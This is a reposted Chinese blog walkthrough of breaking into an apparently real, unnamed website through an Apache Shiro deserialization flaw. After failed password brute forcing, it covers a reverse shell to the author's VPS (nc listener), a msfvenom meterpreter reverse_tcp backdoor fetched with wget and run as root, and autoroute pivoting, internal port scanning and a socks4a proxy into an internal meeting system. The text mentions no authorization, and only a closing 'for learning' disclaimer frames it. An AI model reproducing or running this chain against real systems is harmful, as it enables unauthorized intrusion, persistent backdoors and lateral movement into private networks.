实战|某网站shiro反序列化漏洞的渗透过程_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

实战|某网站shiro反序列化漏洞的渗透过程

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


实战|某网站shiro反序列化漏洞的渗透过程

前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户,     返回包存在 :Set-Cookie: rememberMe=deleteMe; 参数, 测试一下 shiro漏洞,万一没修复就捡到了,美滋滋   成功打到DNSLOG 返回信息       得到log,确定漏洞是存在的,脚本写入linux反弹shell的命令,   vps 开启NC 监听  nc -lvp 777 成功返回         获得服务器权限 root ,开始通过dnslog 知道服务器是通外网的,利用msf 生成  elf 后门     msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf   把生成好的后门放在远程HTTP服务上面, 在shell里,wget 远程下载 成功下载以后,chmod 给后门权限 777 就行,-rwxrwxrwx 1 root root msf 运行命令  use exploit/multi/handler   获得shell反弹地址 set payload linux/x64/meterpreter/reverse_tcp 地址填写VPS  端口写后门端口就好了,直接run 查看内网路由,添加路由命令   run get_local_subnets //获取路由地址run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由run autoroute -p //查看添加的路由run autorouute -d //删除添加的路由   内网扫描端口  use auxiliary/scanner/portscan/tcp  利用msf socks4a模块代理   use auxiliary/server/socks4a set SRVHOST IPset SRVPORT 端口   运行返回信息:   msf5 auxiliary(server/socks4a) > run[*] Auxiliary module running as background job 0.[*] Starting the socks4a proxy server   本地利用代理连接 代理的服务器 设置好端口 ,浏览器访问 某会议系统  作者:时光与她Time链接:https://www.jianshu.com/p/43623c4daa3c 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END

实战|某网站shiro反序列化漏洞的渗透过程